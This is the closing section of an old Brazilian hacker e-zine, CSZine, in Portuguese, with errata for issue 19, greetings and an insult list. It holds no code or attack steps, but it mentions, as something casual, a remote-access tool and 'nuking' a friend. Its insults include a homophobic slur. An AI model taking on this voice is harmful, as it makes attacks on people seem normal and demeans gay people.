Gostaria entao de corrigir esses dois errinhos da CSZine que escaparam na edicao 19 (1. ERRATAS).
O primeiro. Naquela fonte do html eu fiz o maximo para deixar o mais simples possivel e nem percebi que jah havia colocado aquilo antes da fonte.
O segundo. A RwX como jah viram agora esta em http://rwx.ml.org e nao em http://www.rwx.ml.org . Isso e' questoes de W's.
Um abraco para todo o pessoal de lah e obrigado novamente pela paciencia que todos estao tento em me aguentar :)
Mandem os emails para cszine@hotmail.com
Um abraço para...
...|zERo| que me ajudou a lidar com o BO.
...Ao pessoal da RwX por poder dizer que a zine tah uma merda e nao fazer isso.
...Ao voodoo por ter paciencia comigo quando o nukei.
...Ao SoulSpy que e' tri gente fina e tah ajudando um monte na anunciacao da zine.
...Ao keko que embora nao saiba nada e' da familia(meu primo).
...A minha mãe, ao papai ao titio e a titia.
...E especialmente a voce.
Um pau na bunda para...
...todos os Underqquercoisa que se acham os tais por ter op no #hackers.
...as bixas do geocities que nao aguentam uma page por 1 mes.
...a todos aqueles que retiraram o nik do autor dessa zine e colocaram o seu.
...a minha professora de biologia que me deixou abaixo da media nos 2 primeiros bimestres por ter perdido os meus trabalhos.
...ao Simon Phoenix por nao ter me mandado os textos soh pq eu nao devolvi os disquetes que ele me empresto.
...a todos que me odeiam.